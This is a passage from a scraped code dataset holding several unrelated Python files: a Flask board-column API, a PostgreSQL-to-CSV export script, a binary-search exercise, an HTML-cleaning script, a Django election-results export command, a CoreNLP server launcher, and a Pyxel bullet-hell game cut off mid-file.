**kwargs)\n\n def set_methods(self):\n return {\"POST\": self.create}\n\n def create(self, board_id: int, *args, **kwargs):\n resp = self.use_cases.create_board_column(\n CreateBoardColumn(\n board_id=request.json.get(\"board_id\"), name=request.json.get(\"name\")\n )\n )\n\n return resp.item.to_json() if 
resp.is_ok else resp.dump_errors(), resp.status\n\n\nclass BoardColumnSingleAPI(APIBase):\n def __init__(self, use_cases, *args, **kwargs):\n self.use_cases = use_cases\n super().__init__(*args, **kwargs)\n\n def set_methods(self):\n return {\"GET\": self.get_by_id, \"PUT\": self.update, \"DELETE\": self.delete}\n\n def get_by_id(self, board_id: int, id: int, *args, **kwargs):\n resp = self.use_cases.get_board_column(\n req=GetBoardColumn(board_id=board_id, id=id)\n )\n\n return resp.item.to_json() if resp.is_ok else resp.dump_errors(), resp.status\n\n def update(self, board_id: int, id: int, *args, **kwargs):\n resp = self.use_cases.update_board_column(\n req=UpdateBoardColumn(\n id=id,\n board_id=request.json.get(\"board_id\"),\n name=request.json.get(\"name\"),\n )\n )\n\n return resp.item.to_json() if resp.is_ok else resp.dump_errors(), resp.status\n\n def delete(self, id: int, *args, **kwargs):\n resp = self.use_cases.delete_board_column(req=DeleteBoardColumn(id=id))\n\n return {} if resp.is_ok else resp.dump_errors(), resp.status\n\n\ndef register_routes(app, use_cases):\n board_column_list_api = BoardColumnListAPI(use_cases)\n board_column_single_api = BoardColumnSingleAPI(use_cases)\n\n board_column_list_api.register_api(\n app,\n \"/api/todolist/boards/columns\",\n \"todolist.board_column.list\",\n )\n board_column_single_api.register_api(\n app,\n \"/api/todolist/boards/columns/\",\n \"todolist.board_column.single\",\n )\n","repo_name":"felipeflamarion/clean-arch","sub_path":"todolist/board_column/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5721426719","text":"#!/usr/bin/python\nimport psycopg2\nfrom configparser import ConfigParser\nimport datetime\n\ndef get_amount():\n \"\"\" query data from the material movement table \"\"\"\n conn = None\n try:\n params = config()\n conn = psycopg2.connect(**params)\n cur = conn.cursor()\n\n #tas\n jenis_value={};\n jenis_index={};\n tas={};\n cur.execute(\"SELECT DISTINCT coalesce(jc.name,'') \\\n FROM vw_cps_last_3_day dy \\\n LEFT JOIN tta_coal_prod_stat_coal_index AS ci \\\n ON dy.generate_series=ci.date \\\n LEFT JOIN tta_coal_prod_stat_jenis_coal_index AS jc \\\n ON ci.jenis=jc.id \\\n WHERE coalesce(jc.name,'') <> '' \\\n limit 3 \")\n rowcount=cur.rowcount\n print(\"The number of row: \", rowcount)\n row = cur.fetchone()\n counter=0\n item={}\n\n if rowcount>0:\n f=open('../../data_coal_index.csv','w')\n f.write('date,')\n while row is not None:\n #print(row)\n jenis_index[counter]=row[0]\n f.write(jenis_index[counter])\n counter+=1\n if counter0:\n while row is not None:\n #f.write(str(row[3])+',')\n date=str(row[0])\n jenis=str(row[1])\n val=str(row[2])\n if date not in item:\n item_2={}\n for ah in jenis_index:\n item_2[jenis_index[ah]]=\"0\"\n item[date]=item_2\n else:\n item_2=item[date]\n item_2[jenis]=val\n row = cur.fetchone()\n\n for i in item:\n f.write(i+',')\n counter=0\n for idx in item[i]:\n tmp=item[i]\n f.write(tmp[idx])\n if counter < len(item[i])-1:\n f.write(',')\n counter+=1\n f.write(\"\\n\")\n f.close()\n cur.close()\n\n print(str(datetime.datetime.now())+' '+str(rowcount)+' row updated')\n except (Exception, psycopg2.DatabaseError) as error:\n print(str(datetime.datetime.now())+' '+str(error))\n finally:\n if conn is not None:\n conn.close()\n\ndef config(filename='database.ini', section='postgresql'):\n # create a parser\n parser = ConfigParser()\n # read config file\n 
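# NOTE: ConfigParser.read() silently skips files that do not exist, so a\n    # missing database.ini only surfaces below as the 'Section ... not found'\n    # exception rather than as an IOError here.\n    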
parser.read(filename)\n\n # get section, default to postgresql\n db = {}\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = param[1]\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, filename))\n\n return db\n\nif __name__ == '__main__':\n get_amount()\n","repo_name":"hendriramadhon/mamot_report","sub_path":"lib/py/read_coal_index.py","file_name":"read_coal_index.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9396510040","text":"import sys\r\n\r\n\r\n# sys.stdin = open(\"input.txt\")\r\ninput = sys.stdin.readline\r\n\r\n\r\n\r\nn = int(input().strip())\r\nmy_list = list(map(int,input().split()))\r\nmy_list.sort()\r\nq = int(input().strip())\r\nquery = list(map(int,input().split()))\r\n\r\nans_list = []\r\nfor q in query :\r\n\r\n l,r = 0, len(my_list)-1\r\n ans = 9876543210\r\n while l <= r :\r\n mid = (l+r)//2\r\n\r\n if q < my_list[mid]:\r\n r = mid - 1\r\n elif my_list[mid] < q:\r\n l = mid + 1\r\n else :\r\n ans = mid\r\n break\r\n if ans == 9876543210 : ans_list.append(-1)\r\n else : ans_list.append(ans)\r\n\r\nprint(\" \".join(map(str,ans_list)))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"chickenchickenlove/BOJ-Algorithm","sub_path":"Certi/python30.py","file_name":"python30.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41830552884","text":"from bs4 import BeautifulSoup\nimport os\n\nfor file_name in os.listdir():\n if file_name.endswith(\".html\"):\n with open(file_name, 'r') as f:\n contents = f.read()\n soup = BeautifulSoup(contents, 'html.parser')\n section = soup.find(\"section\", {\"class\": \"display-7\"})\n if section:\n section.decompose()\n with open(file_name, 'w') as f:\n f.write(str(soup))","repo_name":"localservices-app/recomand.app","sub_path":"remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6507622266","text":"import json\nfrom collections import defaultdict\n\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import DefaultStorage\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Prefetch\nfrom popolo.models import Membership\nfrom uk_results.models import ResultSet\nfrom utils.dict_io import BufferDictWriter\n\n\nclass Command(BaseCommand):\n FIELDNAMES = [\n \"election_id\",\n \"ballot_paper_id\",\n \"person_id\",\n \"party_id\",\n \"party_name\",\n \"person_name\",\n \"ballots_cast\",\n \"elected\",\n \"spoilt_ballots\",\n \"turnout\",\n \"turnout_percentage\",\n \"total_electorate\",\n \"source\",\n ]\n\n def add_arguments(self, parser):\n parser.add_argument(\"--election-date\", action=\"store\", required=True)\n\n parser.add_argument(\n \"--format\", action=\"store\", required=True, choices=[\"csv\", \"json\"]\n )\n\n def handle(self, **options):\n date = options[\"election_date\"]\n format = options[\"format\"]\n directory_path = \"csv-archives\"\n self.storage = DefaultStorage()\n output_filename = \"{}/results-{}.{}\".format(\n directory_path, date, format\n )\n\n qs = (\n ResultSet.objects.filter(ballot__election__election_date=date)\n .select_related(\"ballot\", \"ballot__election\")\n .prefetch_related(\n Prefetch(\n 
\"ballot__membership_set\",\n Membership.objects.select_related(\"person\", \"party\"),\n )\n )\n )\n out_data = []\n for result in qs:\n for membership in result.ballot.membership_set.all():\n if not hasattr(membership, \"result\"):\n continue\n row = {\n \"election_id\": result.ballot.election.slug,\n \"ballot_paper_id\": result.ballot.ballot_paper_id,\n \"turnout\": result.num_turnout_reported,\n \"turnout_percentage\": result.turnout_percentage,\n \"spoilt_ballots\": result.num_spoilt_ballots,\n \"total_electorate\": result.total_electorate,\n \"source\": result.source,\n }\n party = membership.party\n try:\n if party.name == \"Independent\":\n party_id = \"ynmp-party:2\"\n else:\n party_id = (\n party.identifiers.filter(\n scheme=\"electoral-commission\"\n )\n .get()\n .identifier\n )\n except membership.party.DoesNotExist:\n party_id = \"\"\n row[\"party_id\"] = party_id\n row[\"party_name\"] = party.name\n row[\"person_id\"] = membership.person.pk\n row[\"person_name\"] = membership.person.name\n row[\"ballots_cast\"] = membership.result.num_ballots\n row[\"elected\"] = membership.elected\n out_data.append(row)\n\n if format == \"csv\":\n csv_out = BufferDictWriter(fieldnames=self.FIELDNAMES)\n csv_out.writeheader()\n for row in out_data:\n csv_out.writerow(row)\n out_string = csv_out.output\n else:\n json_data = defaultdict(dict)\n for person in out_data:\n election_dict = json_data[person[\"ballot_paper_id\"]]\n election_dict[\"turnout\"] = person[\"turnout\"]\n election_dict[\"turnout_percentage\"] = person[\n \"turnout_percentage\"\n ]\n election_dict[\"spoilt_ballots\"] = person[\"spoilt_ballots\"]\n election_dict[\"total_electorate\"] = person[\"total_electorate\"]\n election_dict[\"source\"] = person[\"source\"]\n\n if \"candidates\" not in election_dict:\n election_dict[\"candidates\"] = []\n election_dict[\"candidates\"].append(\n {\n \"person_name\": person[\"person_name\"],\n \"person_id\": person[\"person_id\"],\n \"party_name\": person[\"party_name\"],\n \"party_id\": person[\"party_id\"],\n \"ballots_cast\": person[\"ballots_cast\"],\n \"elected\": person[\"elected\"],\n }\n )\n election_dict[\"candidates\"] = sorted(\n election_dict[\"candidates\"],\n key=lambda p: p[\"ballots_cast\"],\n reverse=True,\n )\n out_string = json.dumps(json_data, indent=4)\n\n self.storage.save(\n output_filename, ContentFile(out_string.encode(\"utf8\"))\n )\n","repo_name":"DemocracyClub/yournextrepresentative","sub_path":"ynr/apps/uk_results/management/commands/uk_results_create_file.py","file_name":"uk_results_create_file.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"22783900287","text":"\"\"\" Starts a number of CoreNLP servers \"\"\"\nimport argparse\nimport subprocess\nimport os\nimport pdb\n\n\ndef start_servers(start_port, n_servers):\n os.chdir('CoreNLP')\n processes = []\n for i in range(n_servers):\n cmd = f'sh start_corenlp_server.sh {start_port+i}'\n process = subprocess.Popen(cmd, shell=True)\n processes.append(process)\n\n return processes\n\n\ndef stop_servers(start_port, n_servers):\n # Find PIDs, kill\n for i in range(n_servers):\n try:\n pid = subprocess.check_output([\"pgrep\", '-f', f'port {start_port+i}'])\n pid = int(pid[:-1])\n os.kill(pid, 9)\n except subprocess.CalledProcessError as e:\n print(f'Port {start_port+i} not able to be killed')\n continue\n\n # Remove tmp lock\n shutdown_keypath = 'CoreNLP/tmp/corenlp.shutdown'\n if 
os.path.exists(shutdown_keypath):\n os.remove(shutdown_keypath)\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Starts or stops a number of CoreNLP servers')\n parser.add_argument('start_port', nargs='?', type=int, help='an integer for the accumulator')\n parser.add_argument('n_servers', nargs='?', type=int, help='the number of servers to start or stop')\n parser.add_argument('--start', dest='start', action='store_true')\n parser.add_argument('--stop', dest='stop', action='store_true')\n parser.set_defaults(start=False)\n parser.set_defaults(stop=False)\n args = parser.parse_args()\n\n if args.start:\n start_servers(args.start_port, args.n_servers)\n elif args.stop:\n stop_servers(args.start_port, args.n_servers)\n\nif __name__ == '__main__':\n main()\n","repo_name":"michaelmilleryoder/fanfiction-nlp-archive","sub_path":"run_corenlp_servers.py","file_name":"run_corenlp_servers.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2647130710","text":"import pyxel\nimport math\nimport random\nimport csv\n\n\nclass Game():\n\n def __init__(self):\n\n pyxel.init(128,128,\"NDC 2023\",60)\n pyxel.mouse(True)\n pyxel.load('res.pyxres')\n\n self.posx,self.posy = None,None\n self.velx,self.vely = None,None\n self.hp_max = None\n self.hp = None\n self.hp_percent = None\n self.deathcd = None\n\n self.shoot_cd = None\n self.shoot_rate = None\n self.spread = None\n self.amount_bullet = None\n self.bullets = None\n\n self.explosions = None\n\n self.boss = None\n\n self.menus = None\n self.text_screen = None\n for index,line in enumerate(csv.reader(open(\"scoreboard.csv\", \"r\"))):\n if index == 0:\n self.highscore = [line[0],int(line[1])]\n self.score = None\n self.time = None\n self.scene = None\n\n self.menu()\n\n pyxel.run(self.update,self.draw)\n\n def menu(self):\n\n self.menus = [\n [Button(32,64,\"Start\",self.start),Button(32,80,\"Scoreboard\",self.scoreboard),Button(32,96,\"Quit game\",pyxel.quit)],\n [Button(8,112,\"Menu\",self.menu)],\n [],\n [Button(8,112,\"Save\",self.save)]\n ]\n self.text_screen = \"\"\n self.name = None\n self.scene = 0\n\n def start(self):\n\n self.posx,self.posy = 64,96\n self.velx,self.vely = 0,0\n self.hp_max = 100\n self.hp = self.hp_max\n self.hp_percent = 1\n self.deathcd = 0\n\n self.shoot_rate = 2\n self.spread = 10\n self.amount_bullet = 3\n self.bullets = []\n\n self.explosions = []\n\n self.boss = Boss(64,16,1,2,3)\n\n self.time = pyxel.frame_count\n self.name = Name()\n self.scene = 2\n\n def save(self):\n\n score_line = [self.score[0],self.score[1],int(self.hp_percent*100),int(self.boss.hp_percent*100),self.time]\n \n scoreboard = [x for x in csv.reader(open(\"scoreboard.csv\", \"r\"))]\n output = []\n while len(scoreboard) < 13:\n scoreboard.append([\" X \",0,0,0,0])\n\n for x in range(13):\n if int(score_line[1]) > int(scoreboard[x][1]):\n output.append(score_line)\n score_line = scoreboard[x]\n else:\n output.append(scoreboard[x])\n \n scoreboard = csv.writer(open(\"scoreboard.csv\", \"w\", newline=\"\"))\n scoreboard.writerows(output)\n\n self.scoreboard()\n\n def scoreboard(self):\n\n self.scene = 1\n\n scoreboard = csv.reader(open(\"scoreboard.csv\", \"r\"))\n self.text_screen = \" NAM SCO HLT BOS TIM\\n\\n\"\n for index,line in enumerate(scoreboard):\n self.text_screen += (\" \"*(2-len(str(index+1)))) + str(index+1) + \" \" + str(line[0]) + \" \" + str(line[1]) + (\" \"*(5-len(str(line[1])))) + str(line[2]) + \"%\" + (\" 
\"*(4-len(str(line[2])))) + str(line[3]) + \"%\" + (\" \"*(3-len(str(line[3])))) + str(line[4]) + \"s\\n\"\n\n def update(self):\n\n if self.scene == 1:\n\n self.scoreboard()\n \n if self.scene == 2 or self.scene == 3:\n if self.hp_percent > 0:\n self.player()\n else:\n self.death()\n self.boss.update(self)\n for bullet in self.bullets:\n bullet.update()\n if bullet.posx > self.boss.posx - 12 and bullet.posx < self.boss.posx + 12 and bullet.posy > self.boss.posy - 12 and bullet.posy < self.boss.posy + 12 and bullet.type == 0:\n self.boss.hp = max(self.boss.hp-1,0)\n bullet.alive = False\n if bullet.posx > self.posx - 3 and bullet.posx < self.posx + 3 and bullet.posy > self.posy - 3 and bullet.posy < self.posy + 3 and bullet.type != 0: \n if bullet.type == 1:\n self.hp = max(self.hp-1,0)\n elif bullet.type == 2:\n self.hp = max(self.hp-5,0)\n elif bullet.type == 3:\n self.hp = max(self.hp-10,0)\n bullet.alive = False\n\n if not bullet.alive:\n self.bullets.remove(bullet)\n \n for explosion in self.explosions:\n explosion.update()\n if explosion.tick > 8:\n self.explosions.remove(explosion)\n \n if self.scene == 3:\n\n self.name.update()\n\n self.score = [self.name.name,int(3333*self.hp_percent) + int(3333*(1-self.boss.hp_percent)) + int((min(3333*(self.boss.hp_percent == 0),(20*3333)/self.time)))]\n\n if self.score[1] >= self.highscore[1]:\n self.highscore = [self.score[0],max(self.highscore[1],self.score[1])]\n\n self.text_screen = \"You won the battle !\\n\\nHealth left : \" + str(int(self.hp_percent*100)) + \"%\\nHealth boss lost : \" + str(int((1-self.boss.hp_percent)*100)) + \"%\\nTimer : \" + str(self.time) + \" seconds\\n\\nHighscore : \" + str(self.highscore[0]) + \" \" + str(self.highscore[1]) + \"\\nScore : \" + str(int(3333*self.hp_percent)) + \"+\" + str(int(3333*(1-self.boss.hp_percent))) + \"+\" + str(int((min(3333*(self.boss.hp_percent == 0),20000/self.time))))\n\n for button in self.menus[self.scene]:\n button.update(self)\n\n def draw(self):\n\n pyxel.cls(0)\n\n if self.scene == 0:\n pyxel.bltm(0,0,0,0,0,128,128,0)\n\n if self.scene == 1:\n pyxel.bltm(0,0,0,128,0,128,128,0)\n pyxel.text(16,16,self.text_screen,15)\n\n if self.scene == 2 or self.scene == 3:\n for bullet in self.bullets:\n bullet.draw()\n self.boss.draw()\n pyxel.rect(self.posx - 3,self.posy - 3,7,7,1+(12*(self.hp_percent == 0)))\n pyxel.pset(self.posx,self.posy,7)\n if self.scene == 2:\n pyxel.rect(120,2,6,124,13)\n pyxel.rect(120,2+124*(1-self.boss.hp_percent),6,124*self.boss.hp_percent,8)\n pyxel.rect(2,66,6,60,13)\n pyxel.rect(2,66+60*(1-self.hp_percent),6,60*self.hp_percent,11)\n else:\n pyxel.bltm(0,0,0,128,0,128,128,0)\n pyxel.text(16,16,self.text_screen,15)\n pyxel.text(48,96,str(self.score[0])+\" \"+str(self.score[1]),7+(8*int(0.5+((pyxel.frame_count/8)%1))))\n pyxel.text(48,98,str(self.name.selection),7+(8*int(0.5+((pyxel.frame_count/8)%1))))\n\n for explosion in self.explosions:\n explosion.draw()\n\n for button in self.menus[self.scene]:\n button.draw()\n \n def player(self):\n\n self.velx,self.vely = (pyxel.btn(pyxel.KEY_D) - pyxel.btn(pyxel.KEY_Q))/2,(pyxel.btn(pyxel.KEY_S) - pyxel.btn(pyxel.KEY_Z))/2\n \n if pyxel.btn(pyxel.KEY_SPACE) or pyxel.btn(pyxel.MOUSE_BUTTON_RIGHT) or pyxel.btn(pyxel.MOUSE_BUTTON_LEFT):\n \n if pyxel.btn(pyxel.MOUSE_BUTTON_LEFT):\n vector = [pyxel.mouse_x - self.posx,pyxel.mouse_y - self.posy]\n if vector[0] == 0:\n if vector[1] > 0:\n angle = 90\n else:\n angle = 270\n else:\n if vector[1] > 0:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0]))\n 
elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n else:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 360\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n \n else:\n vector = [self.boss.posx - self.posx,self.boss.posy - self.posy]\n if vector[0] == 0:\n if vector[1] > 0:\n angle = 90\n else:\n angle = 270\n else:\n if vector[1] > 0:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0]))\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n else:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 360\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n\n if self.shoot_cd == 0:\n pyxel.play(0,1)\n if self.amount_bullet == 1:\n self.bullets += [Bullet(self.posx,self.posy,angle,1,0,0)]\n else:\n for x in range(int(-self.spread/2),int(self.spread/2)+1,int(self.spread/(self.amount_bullet-1))):\n self.bullets += [Bullet(self.posx,self.posy,angle+x,1,0,0)]\n\n self.shoot_cd = 10/self.shoot_rate\n\n if self.posx + self.velx - 3 > 0 and self.posx + self.velx + 3 < 128:\n self.posx = self.posx + self.velx\n if self.posy + self.vely - 3 > 0 and self.posy + self.vely + 3 < 128:\n self.posy = self.posy + self.vely\n self.shoot_cd = max(0,self.shoot_cd - 1)\n self.hp_percent = self.hp/self.hp_max\n\n def death(self):\n\n if self.scene == 2:\n self.deathcd += 1\n if self.deathcd < 20:\n self.explosions += [Explosion(random.uniform(self.posx-6,self.posx+6),random.uniform(self.posy-6,self.posy+6))]\n if self.deathcd >= 30:\n self.bullets = [x for x in self.bullets if x.type != 0]\n self.time = int((pyxel.frame_count - self.time)/60)\n self.scene = 3\n\n\n\nclass Bullet:\n\n def __init__(self,x,y,angle,vel,rot_speed,type):\n \n self.posx,self.posy = x,y\n self.angle = angle\n self.graphic_angle = 0\n self.vel = vel\n self.rot_speed = rot_speed\n self.type = type\n self.alive = True\n\n def update(self):\n\n self.posx,self.posy = self.posx + math.cos(math.radians(self.angle))*self.vel,self.posy + math.sin(math.radians(self.angle))*self.vel\n self.angle += self.rot_speed\n self.graphic_angle += 3\n self.rot_speed = self.rot_speed*0.98\n if self.posx > 192 or self.posx < -64 or self.posy > 192 or self.posy < -64:\n self.alive = False\n\n def draw(self):\n\n if self.type == 0:\n pyxel.circ(self.posx,self.posy,1,10)\n if self.type == 1:\n pyxel.circ(self.posx,self.posy,1,6)\n if self.type == 2:\n triangle(self.posx,self.posy,self.graphic_angle,5,11)\n if self.type == 3:\n square(self.posx,self.posy,self.graphic_angle,4,3)\n\n\n\nclass Boss:\n\n def __init__(self,x,y,hp_percent,rotation_speed, cubes):\n\n self.hp_max = 2000\n self.hp = self.hp_max*hp_percent\n self.hp_percent = hp_percent\n self.speed = 0.5\n self.vel = self.speed\n\n self.posx = x\n self.posy = y\n\n self.cubes = [[Cube(15,1),random.uniform(rotation_speed*0.90,rotation_speed*1.1)*random.choice([-1,1])] for i in range(cubes)]\n self.cubes += [[Cube(25,2),random.uniform(rotation_speed*0.90,rotation_speed*1.1)*random.choice([-1,1])] for i in range(int(cubes/2))]\n\n self.target = [64,64]\n self.pattern = [[64,16]]\n #posx,posy,angle,vel,rot_speed,type,cd,cd_max,spread,amount,spin?\n self.shooting_pattern = []\n if self.hp_percent == 1:\n self.phase = 0\n elif self.hp_percent > 0.75:\n self.phase = 1\n elif self.hp_percent > 0.5:\n self.phase = 2\n elif self.hp_percent > 0.25:\n self.phase = 3\n else:\n self.phase = 4\n\n self.deathcd = 0\n\n 
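# A hypothetical helper (sketch; slot names are an assumption inferred from\n    # the positional comment above and from how shoot() indexes the patterns):\n    @staticmethod\n    def pattern_slots():\n        return (\"posx\", \"posy\", \"angle\", \"vel\", \"rot_speed\", \"type\",\n                \"cd\", \"cd_max\", \"spread\", \"amount\", \"spin\")\n\n    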
def update(self,game):\n\n self.phases()\n self.deplacements(game)\n self.shoot(game)\n self.death(game)\n\n for cube in self.cubes:\n cube[0].update(self.posx,self.posy)\n \n self.hp_percent = self.hp/self.hp_max\n\n def draw(self):\n for cube in self.cubes:\n if self.phase < 6:\n cube[0].anglex += cube[1]\n cube[0].angley += cube[1]\n cube[0].anglez += cube[1]\n else:\n cube[0].color = 13\n cube[0].draw()\n #pyxel.pset(self.posx,self.posy,7)\n #pyxel.pset(*self.target,6)\n \n def deplacements(self,game):\n\n self.patterns(game)\n\n vector = [self.target[0] - self.posx,self.target[1] - self.posy]\n if vector[0] == 0:\n if vector[1] > 0:\n angle = 90\n else:\n angle = 270\n else:\n if vector[1] > 0:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0]))\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n else:\n if vector[0] > 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 360\n elif vector[0] < 0:\n angle = math.degrees(math.atan(vector[1]/vector[0])) + 180\n\n self.posx += min((math.cos(math.radians(angle))*self.vel, self.target[0] - self.posx),key=lambda x:abs(x))\n self.posy += min((math.sin(math.radians(angle))*self.vel, self.target[1] - self.posy),key=lambda x:abs(x))\n\n def patterns(self,game):\n \n if self.phase == 4:\n self.target = [game.posx,game.posy]\n else:\n self.target = self.pattern[0]\n \n if self.posx == self.target[0] and self.posy == self.target[1]:\n self.pattern.append(self.pattern[0])\n self.pattern.pop(0)\n\n def phases(self):\n\n #shooting pattern : posx,posy,angle,vel,rot_speed,type,cd,cd_max,spread,amount,spin?\n\n if self.phase == 0:\n self.pattern = [[16,16],[112,16]]\n self.shooting_pattern = [[None,None,90,1,0,1,100,20,45,3,False],[0,34,0,1,0,3,0,2,0,1,False],[128,34,180,1,0,3,0,2,0,1,False]]\n self.vel = self.speed\n self.phase = 1\n elif self.phase == 1 and self.hp_percent < 0.75:\n self.pattern = [[64,64]]\n self.shooting_pattern = [[None,None,0,0.5,5,2,100,10,360,3,True],[None,None,0,0.25,0,1,100,100,360,18,False]]\n self.vel = self.speed * 1.5\n self.phase = 2\n elif self.phase == 2 and self.hp_percent < 0.5:\n self.pattern = [[16,16],[112,16],[112,112],[16,112]]\n self.shooting_pattern = [[None,None,0,0.25,0,1,100,100,360,20,True],[None,None,0,0.5,0,2,100,200,360,15,True],[None,None,0,0.75,0,3,100,200,360,10,True]]\n self.vel = self.speed\n self.phase = 3\n elif self.phase == 3 and self.hp_percent < 0.25:\n self.pattern = [[]]\n self.shooting_pattern = [[None,None,0,0.25,0,1,0,100,360,20,True],[None,None,0,0.5,0,2,0,100,360,15,True],[None,None,0,0.75,0,3,0,100,360,10,True]]\n self.vel = self.speed * 0.25\n self.phase = 4\n elif self.phase == 4 and self.hp_percent <= 0:\n self.pattern = [[self.posx,self.posy]]\n self.shooting_pattern = [[]]\n self.phase = 5\n\n def shoot(self,game):\n\n for pattern in self.shooting_pattern:\n bullet = [x for x in pattern]\n if len(bullet) > 0:\n if bullet[0] == None:\n bullet[0] = self.posx\n if bullet[1] == None:\n bullet[1] = self.posy\n\n if bullet[6] == 0:\n if bullet[9] == 1:\n game.bullets += [Bullet(*bullet[0:6])]\n elif bullet[8] == 360:\n for x in range(int(-bullet[8]/2),int(bullet[8]/2)+1,int(bullet[8]/(bullet[9]))):\n game.bullets += [Bullet(*bullet[0:2],bullet[2]+x,*bullet[3:6])]\n else:\n for x in range(int(-bullet[8]/2),int(bullet[8]/2)+1,int(bullet[8]/(bullet[9]-1))):\n game.bullets += [Bullet(*bullet[0:2],bullet[2]+x,*bullet[3:6])]\n\n pattern[6] = bullet[7] * min(0.75 + self.hp_percent,1)\n\n if bullet[10]:\n pattern[2] -= bullet[3]/2 \n 
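# per-frame cooldown tick: pattern[6] counts down and the pattern fires\n            # again once it reaches 0 (reset above to cd_max scaled by boss hp)\n            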
pattern[6] = max(0,pattern[6] - 1)\n \n def death(self,game):\n\n if self.phase == 5:\n self.deathcd += 1\n if self.deathcd < 30:\n game.explosions += [Explosion(random.uniform(self.posx-12,self.posx+12),random.uniform(self.posy-12,self.posy+12))]\n if self.deathcd >= 30:\n self.phase = 6\n game.bullets = [x for x in game.bullets if x.type == 0]\n game.time = int((pyxel.frame_count - game.time)/60)\n game.scene = 3\n\n\n\nclass Name:\n\n def __init__(self):\n self.char = [65,65,65]\n self.name = chr(self.char[0]) + chr(self.char[1]) + chr(self.char[2])\n self.selected_char = 0\n self.selection = \" \"\n\n def update(self):\n\n underscore = [\"_ \",\" _ \",\" _\"]\n\n self.name = chr(self.char[0]) + chr(self.char[1]) + chr(self.char[2])\n\n if pyxel.btnp(pyxel.KEY_RIGHT):\n self.selected_char += 1\n if pyxel.btnp(pyxel.KEY_LEFT):\n self.selected_char -= 1\n if self.selected_char > 2:\n self.selected_char = 0 \n if self.selected_char < 0:\n self.selected_char = 2\n\n self.selection = underscore[self.selected_char]\n\n if pyxel.btnp(pyxel.KEY_UP):\n self.char[self.selected_char] += 1\n if pyxel.btnp(pyxel.KEY_DOWN):\n self.char[self.selected_char] -= 1\n for x,char in enumerate(self.char):\n if char > 90:\n self.char[x] = 65 \n if char < 65:\n self.char[x] = 90\n\n\n\nclass Button:\n\n def __init__(self,x,y,text,function):\n self.posx,self.posy = x,y\n self.text = text\n self.function = function\n self.hover = False\n\n def update(self,game):\n self.hover = pyxel.mouse_x > self.posx and pyxel.mouse_x < self.posx + 64 and pyxel.mouse_y > self.posy and pyxel.mouse_y < self.posy + 16\n\n if pyxel.btnp(pyxel.MOUSE_BUTTON_LEFT) and self.hover:\n game.shoot_cd = 10\n self.function()\n\n def draw(self):\n pyxel.blt(self.posx,self.posy,0,0,32+(8*self.hover),64,8,0)\n pyxel.text(self.posx + 10 ,self.posy,self.text,15-(8*self.hover))\n\n\n\nclass Cube:\n\n def __init__(self,size,color):\n\n self.corners = [\n [[-1],[-1],[1]],\n [[1],[-1],[1]],\n [[1],[1],[1]],\n [[-1],[1],[1]],\n [[-1],[-1],[-1]],\n [[1],[-1],[-1]],\n [[1],[1],[-1]],\n [[-1],[1],[-1]]\n ]\n self.anglex = 0\n self.angley = 0\n self.anglez = 0\n self.size = size\n self.color = color\n\n self.posx = 64\n self.posy = 64\n\n def update(self,x,y):\n\n self.posx,self.posy = x,y\n\n \n def draw(self):\n\n rotationx = [\n [1, 0, 0],\n [0, math.cos(math.radians(self.anglex)), -math.sin(math.radians(self.anglex))],\n [0, math.sin(math.radians(self.anglex)), math.cos(math.radians(self.anglex))]\n ]\n rotationy = [\n [math.cos(math.radians(self.angley)), 0, -math.sin(math.radians(self.angley))],\n [0, 1, 0],\n [math.sin(math.radians(self.angley)), 0, math.cos(math.radians(self.angley))]\n ]\n rotationz = [\n [math.cos(math.radians(self.anglez)), -math.sin(math.radians(self.anglez)), 0],\n [math.sin(math.radians(self.anglez)), math.cos(math.radians(self.anglez)), 0],\n [0, 0, 1]\n ]\n figure2d = []\n for corner in self.corners:\n rotated2d = matrix_multiplication(rotationy, corner)\n rotated2d = matrix_multiplication(rotationx, rotated2d)\n rotated2d = matrix_multiplication(rotationz, rotated2d)\n \n distance = 5\n z = 1/(distance - rotated2d[2][0])\n projection_matrix = [\n [z, 0, 0],\n [0, z, 0]\n ]\n projected_2d = matrix_multiplication(projection_matrix, rotated2d)\n\n figure2d += [[int(projected_2d[0][0] * (self.size*2)) + self.posx,int(projected_2d[1][0] * (self.size*2)) + self.posy]]\n\n for k in range(4):\n pyxel.line(*figure2d[k], *figure2d[(k+1)%4],self.color)\n pyxel.line(*figure2d[k + 4], *figure2d[(k+1)%4 +4],self.color)\n 
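# third edge set: join each projected front-face corner k to its back-face twin k+4\n            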
